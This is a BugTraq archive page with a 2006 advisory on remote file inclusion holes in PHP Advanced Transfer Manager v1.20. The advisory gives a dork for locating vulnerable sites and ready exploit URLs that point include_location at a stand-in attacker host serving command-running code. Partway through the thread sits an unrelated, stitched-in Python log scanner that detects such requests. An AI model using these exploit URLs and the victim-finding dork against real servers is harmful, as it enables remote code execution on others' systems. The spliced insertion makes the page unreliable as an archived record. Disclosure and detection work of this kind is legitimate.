BugTraq
PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities Sep 10 2006 05:19PM
l0x3 hotmail com (1 reply)
+--------------------------------------------------------------------

+

+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: PHP Advanced Transfer Manager v1.20

+ Vendor ...........: http://phpatm.free.fr/

+ Class .............: Remote File Inclusion

+ Risk ..............: High (Remote File Ex3cut1on)

+ Discovered by ..........: Eddy_BAck0o

+ Contact ...........: l0x3[at]hotmail.com ; www.LEzr.com/vB

+

+--------------------------------------------------------------------

+

+ This weakness has existed for a long time,

+ but I had not published it before,

+ and many sites run this vulnerable version ...

+ you can be sure of that by dorking it:

+ intext:"Powered by PHP Advanced Transfer Manager v1.20"

+ Ex --> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r0x.txt?cmd

+

+--------------------------------------------------------------------

+ ./index Directory ...

~ [Login.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ include($include_location.'include/conf.php');

+ include($include_location.'include/common.'.$phpExt);

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Line --> 26 - 625

+ Ex --> http://www.victom.com/[path]/Login.php?include_location=http://www.yourev1l.com/r0x.txt?cmd

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ [activate.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ include($include_location.'include/conf.php');

+ include($include_location.'include/common.'.$phpExt);

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Line --> 26 - 121

+ Ex --> http://www.victom.com/[path]/activate.php?include_location=http://www.yourev1l.com/r0x.txt?cmd

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ [configure.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ include($include_location.'include/conf.php');

+ include($include_location.'include/common.'.$phpExt);

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Line --> 26 - 165

+ Ex --> http://www.victom.com/[path]/configure.php?include_location=http://www.yourev1l.com/r0x.txt?cmd

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ confirm.php < -------- 26 - 122

~ fileop.php < -------- 26 - 145

~ getimg.php < -------- 26 - 56

~ ipblocked.php < -------- 25 - 71

~ register.php < -------- 26 - 291

~ showrecent.php < -------- 26 - 275

~ showtophits.php < -------- 26 - 237

~ usrmanag.php < -------- 26 - 381

~ viewer_bottom.php < -------- 27 - 50

~ viewer_content.php < -------- 27 - 49

~ viewer_top.php < -------- 27 - 57

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best;

+ and all my team ;....

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
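As an added defender-side example (not part of the advisory, and not code from phpAtm), here is a Python check that scans combined-format web server access logs for requests to the scripts listed above whose include_location parameter carries a URL scheme or a ".." path component. The sample log lines, hostnames and addresses in it are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory lists as passing $include_location straight into include().
PHPATM_SCRIPTS = {
    "login.php", "activate.php", "configure.php", "confirm.php", "fileop.php",
    "getimg.php", "ipblocked.php", "register.php", "showrecent.php", "showtophits.php",
    "usrmanag.php", "viewer_bottom.php", "viewer_content.php", "viewer_top.php",
}

# Combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A URL scheme or scheme-relative prefix means include() would fetch remote code.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)
# A ".." path component means the include escapes the application directory.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def classify_include_location(value):
    """Label one include_location value, or return None if it looks like a local prefix."""
    v = unquote(value)  # second decode catches double-encoded values
    if REMOTE_RE.search(v):
        return "remote-include"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    if "\x00" in v:
        return "null-byte"
    return None

def scan_access_log(lines):
    """Yield (ip, timestamp, script, label, value) for requests abusing include_location."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        script = parts.path.rsplit("/", 1)[-1].lower()
        if script not in PHPATM_SCRIPTS:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("include_location", []):
            label = classify_include_location(value)
            if label:
                yield (m.group("ip"), m.group("ts"), script, label, unquote(value))

# Constructed sample log; the hostnames and addresses are placeholders, not real indicators.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2006:17:19:02 +0000] "GET /atm/index.php HTTP/1.1" 200 5120
203.0.113.7 - - [10/Sep/2006:17:19:05 +0000] "GET /atm/Login.php?include_location=http://www.yourev1l.com/r0x.txt?cmd HTTP/1.1" 200 312
198.51.100.4 - - [10/Sep/2006:17:20:11 +0000] "GET /atm/viewer_top.php?include_location=..%2F..%2F..%2Fetc%2F HTTP/1.1" 500 201
198.51.100.4 - - [10/Sep/2006:17:20:40 +0000] "GET /atm/showrecent.php?page=2 HTTP/1.1" 200 4096
"""
```

Running `list(scan_access_log(SAMPLE_LOG.splitlines()))` flags the Login.php request as a remote include and the viewer_top.php request as traversal, while the two ordinary requests are ignored.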

Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities Sep 13 2006 10:46AM
Carsten Eilers (ceilers-lists gmx de)
Copyright 2010, SecurityFocus